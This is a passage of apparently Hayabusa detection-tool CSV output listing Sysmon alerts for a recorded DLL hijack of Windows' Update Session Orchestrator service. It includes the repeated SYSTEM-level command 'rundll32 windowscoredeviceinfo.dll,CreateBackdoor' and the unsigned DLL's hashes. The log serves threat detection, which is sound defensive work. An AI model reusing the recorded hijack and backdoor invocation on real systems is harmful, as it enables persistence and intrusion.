747F3D96-9F61-5E75-0000-00109B6C1E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:17.998 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 4848 | PGUID: 747F3D96-9F61-5E75-0000-0010686A1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:18.003 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 8116 | PGUID: 747F3D96-9F61-5E75-0000-0010736B1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:18.005 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:18.007 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7124 | PGUID: 747F3D96-9F61-5E75-0000-00103D6F1E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:18.011 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 6620 | PGUID: 747F3D96-9F61-5E75-0000-00109B6C1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:18.011 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:18.014 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7380 | PGUID: 747F3D96-9F61-5E75-0000-001056711E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:18.018 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 7124 | PGUID: 747F3D96-9F61-5E75-0000-00103D6F1E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:18.024 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 7380 | PGUID: 747F3D96-9F61-5E75-0000-001056711E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:18.042 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:18.046 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 8076 | PGUID: 747F3D96-9F61-5E75-0000-001059841E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:18.050 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 8076 | PGUID: 747F3D96-9F61-5E75-0000-001059841E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:19.873 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbghelp.dll | Process: C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.17763.1090_none_5715d73398f9ea47\TiWorker.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 6420 | PGUID: 747F3D96-9F63-5E75-0000-0010BCD01F00 | Hash: SHA1=8B5BC2EAA00C530DF0FF139635E428FA4C5D7AA8,MD5=B0A68C5BB8D5493F1AF967F0FDD80382,SHA256=2CF0972DC8A67D863AD1A6205B66C80865ACC11F7E3F67B4A76C162655EE0FEE,IMPHASH=AB902346D2BD8706EE70C87E00136BAC",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:19.877 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbgcore.dll | Process: C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.17763.1090_none_5715d73398f9ea47\TiWorker.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 6420 | PGUID: 747F3D96-9F63-5E75-0000-0010BCD01F00 | Hash: SHA1=E3FA87C983008D4D2A5D31708415F88548FC7702,MD5=88E88D8C1C663769BDD722000A7EB5A7,SHA256=C84BECA73EA45D3C53D9C42CD6A37CC0CC07FF57D9CFEE113CDF70F640572AEF,IMPHASH=9D75F08EA29885182B136CE4FF854114",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.187 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.189 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 3300 | PGUID: 747F3D96-9F68-5E75-0000-001079652000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.192 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.195 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7420 | PGUID: 747F3D96-9F68-5E75-0000-0010B9662000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.205 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3300 | PGUID: 747F3D96-9F68-5E75-0000-001079652000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.209 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 7420 | PGUID: 00000000-0000-0000-0000-000000000000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.213 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.215 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 2536 | PGUID: 747F3D96-9F69-5E75-0000-00106F6A2000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.218 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.221 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 1828 | PGUID: 747F3D96-9F69-5E75-0000-0010946B2000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.224 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2536 | PGUID: 747F3D96-9F69-5E75-0000-00106F6A2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.230 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1828 | PGUID: 747F3D96-9F69-5E75-0000-0010946B2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.232 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.234 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7836 | PGUID: 747F3D96-9F69-5E75-0000-0010476F2000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.242 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 7836 | PGUID: 747F3D96-9F69-5E75-0000-0010476F2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.247 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.250 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6400 | PGUID: 747F3D96-9F69-5E75-0000-0010DE732000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.255 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 6400 | PGUID: 747F3D96-9F69-5E75-0000-0010DE732000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.388 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.392 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 8160 | PGUID: 747F3D96-9F69-5E75-0000-001055912000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.401 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.421 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6572 | PGUID: 747F3D96-9F69-5E75-0000-001033922000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.425 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon 